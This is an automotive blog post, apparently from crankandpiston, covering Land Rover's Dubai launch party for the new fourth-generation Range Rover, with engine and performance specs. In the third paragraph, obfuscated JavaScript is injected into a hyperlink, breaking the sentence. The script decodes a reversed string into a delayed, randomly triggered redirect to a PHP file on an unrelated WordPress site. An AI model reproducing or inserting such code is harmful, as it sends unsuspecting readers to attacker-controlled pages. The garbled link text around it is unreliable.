I can’t help but feel a little misled by the ‘smart casual’ inference on Land Rover’s invitation. Indeed, as I watch wave after wave of besuited and bejewelled guests step from their Evoques, Range Rover Sports and occasional Jaguar XJs, I feel that it’s only the crankandpiston sticker on my camera and the invite nestling in the back pocket of my jeans that’s keeping security from escorting me from the premises by the collar.

It’s no surprise that the company is going big with the Dubai launch of the new Range Rover though. Quite incredibly, this is only the fourth generation of a model that’s been in production for more than 40 years, and given the popularity of its previous iterations, you can’t blame Land Rover for wanting to get this one right.

So far so good as far as specs go. A 5.0-litre supercharged V8 nestling snuggly under the bonnet (if you splash the cash), an eight-speed automatic transmission with paddle shift, a 235kph top speed, 0-100kph in 5.4s, 510hp and a sizeable 490lb-ft of torque. And quite remarkably –yes, this has featured in $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/new-for-2013-range-rover-all-the-drama/” target=”_blank”>a couple of our posts already, but it’s worth reiterating – the new model has dropped 420kg on its predecessor: they’ve basically taken the crankandpiston team out of the boot.

And clearly the Land Rover boys and girls have pushed the boat out with this launch event too. All around, ladies and gentlemen in blue waistcoasts with silver trays are offering this and that nibble, and a cheeky glass of white. We’re just a stone’s throw from The Walk in Dubai’s Jumeirah Beach Residence region, where drivers often come to parade their automotive pride and joys up and down the concourse, much to the (occasional) delight of people sipping lattes in nearby restaurants and cafes. Given the circumstances of tonight’s event, the location is feels appropriate.
